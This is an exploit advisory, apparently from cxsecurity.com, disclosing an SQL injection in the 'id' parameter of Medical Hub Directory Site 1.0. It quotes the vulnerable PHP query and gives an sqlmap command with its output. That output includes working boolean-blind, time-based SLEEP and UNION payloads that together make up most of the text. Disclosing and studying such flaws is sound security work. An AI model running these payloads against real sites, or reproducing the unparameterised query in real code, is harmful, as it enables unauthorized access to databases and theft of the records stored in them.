Medical Hub Directory Site 1.0 SQL Injection

2022.04.01
Credit: Saud Alenazi
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Medical Hub Directory Site - 'id' SQL Injection # Date: 30/03/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15252/simple-medical-hub-directory-site-phpoop-source-code.html # Version: 1.0 # Tested on: XAMPP, Linux # Vulnerable Code line 9 in file "/mhds/clinic/view_details.php" $categories = $conn->query("SELECT c.category_id,cc.name as category FROM clinic_category c inner join category_list cc on c.category_id = cc.id where c.clinic_id = '{$id}' ")->fetch_all(MYSQLI_ASSOC); # Sqlmap command: sqlmap -u 'http://localhost/mhds/?page=clinic/view_details&id=1' -p id --level=5 --risk=3 --dbs --random-agent --eta # Output: Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=clinic/view_details&id=1' AND 8622=8622-- pBEY Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=clinic/view_details&id=1' AND (SELECT 9741 FROM (SELECT(SLEEP(5)))AmHc)-- Gwec Type: UNION query Title: Generic UNION query (NULL) - 10 columns Payload: page=clinic/view_details&id=-4315' UNION ALL SELECT CONCAT(0x71717a7071,0x4d5246716246517044556c4d4a584f5853646d526a6957666463567a514f73504745636759635454,0x71786a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top